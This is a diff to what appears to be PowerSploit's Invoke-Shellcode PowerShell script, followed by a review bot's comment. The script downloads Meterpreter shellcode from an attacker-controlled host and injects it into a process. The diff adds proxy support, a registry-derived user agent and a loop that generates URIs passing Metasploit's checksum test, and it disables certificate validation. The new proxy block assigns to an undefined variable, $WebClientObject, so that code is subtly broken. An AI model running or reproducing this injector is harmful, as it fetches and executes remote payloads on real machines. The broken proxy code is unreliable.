@@ -49,6 +49,14 @@ Specifies the metasploit payload to use. Currently, only 'windows/meterpreter/re
4949
5050Optionally specifies the user agent to use when using meterpreter http or https payloads
5151
52+ . PARAMETER Proxy
53+
54+ Optionally specifies whether to utilize the proxy settings on the machine.
55+
56+ . PARAMETER Legacy
57+
58+ Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future.
59+
5260. PARAMETER Force
5361
5462Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
@@ -179,7 +187,17 @@ http://www.exploit-monday.com
179187 [Parameter ( ParameterSetName = ' Metasploit' )]
180188 [ValidateNotNull ()]
181189 [String ]
182- $UserAgent = ' Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' ,
190+ $UserAgent = (Get-ItemProperty - Path ' HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ).' User Agent' ,
191+
192+ [Parameter ( ParameterSetName = ' Metasploit' )]
193+ [ValidateNotNull ()]
194+ [Switch ]
195+ $Legacy = $False ,
196+
197+ [Parameter ( ParameterSetName = ' Metasploit' )]
198+ [ValidateNotNull ()]
199+ [Switch ]
200+ $Proxy = $False ,
183201
184202 [Switch ]
185203 $Force = $False
@@ -586,18 +604,51 @@ http://www.exploit-monday.com
586604 {
587605 $SSL = ' s'
588606 # Accept invalid certificates
589- [System.Net.ServicePointManager ]::ServerCertificateValidationCallback = { $true }
607+ [System.Net.ServicePointManager ]::ServerCertificateValidationCallback = {$True }
590608 }
591609 }
592610
593- # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
594- $Request = " http$ ( $SSL ) ://$ ( $Lhost ) :$ ( $Lport ) /INITM"
595- Write-Verbose " Requesting meterpreter payload from $Request "
596-
611+ if ($Legacy )
612+ {
613+ # Old Meterpreter handler expects 'INITM' in the URI in order to initiate stage 0
614+ $Request = " http$ ( $SSL ) ://$ ( $Lhost ) :$ ( $Lport ) /INITM"
615+ Write-Verbose " Requesting meterpreter payload from $Request "
616+ } else {
617+
618+ # Generate a URI that passes the test
619+ $CharArray = 48 .. 57 + 65 .. 90 + 97 .. 122 | ForEach-Object {[Char ]$_ }
620+ $SumTest = $False
621+
622+ while ($SumTest -eq $False )
623+ {
624+ $GeneratedUri = $CharArray | Get-Random - Count 4
625+ $SumTest = (([int []] $GeneratedUri | Measure-Object - Sum).Sum % 0x100 -eq 92 )
626+ }
627+
628+ $RequestUri = -join $GeneratedUri
629+
630+ $Request = " http$ ( $SSL ) ://$ ( $Lhost ) :$ ( $Lport ) /$ ( $RequestUri ) "
631+ }
632+
597633 $Uri = New-Object Uri($Request )
598634 $WebClient = New-Object System.Net.WebClient
599635 $WebClient.Headers.Add (' user-agent' , " $UserAgent " )
600636
637+ if ($Proxy )
638+ {
639+ $WebProxyObject = New-Object System.Net.WebProxy
640+ $ProxyAddress = (Get-ItemProperty - Path ' HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ).ProxyServer
641+
642+ # if there is no proxy set, then continue without it
643+ if ($ProxyAddress )
644+ {
645+
646+ $WebProxyObject.Address = $ProxyAddress
647+ $WebProxyObject.UseDefaultCredentials = $True
648+ $WebClientObject.Proxy = $WebProxyObject
649+ }
650+ }
651+
601652 try
602653 {
603654 [Byte []] $Shellcode32 = $WebClient.DownloadData ($Uri )
@@ -708,6 +759,5 @@ http://www.exploit-monday.com
708759 {
709760 Inject- LocalShellcode
710761 }
711- }
712-
762+ }
713763}
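Review bot: In the third hunk (new line 607), `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}` sets a static, process-wide value, so once the https branch has run, every later TLS request in the same PowerShell session also accepts invalid certificates, and nothing in the visible lines puts the previous value back. Capture it first with `$PrevCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback` and restore it in a `finally` after the download with `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = $PrevCallback`. The `try` around `DownloadData` continues past the end of the hunk, so a restore may already exist there. Separately, in the second hunk `[ValidateNotNull()]` and `= $False` on the new `[Switch]` parameters `$Legacy` and `$Proxy` are redundant, since a switch is never null and already defaults to false.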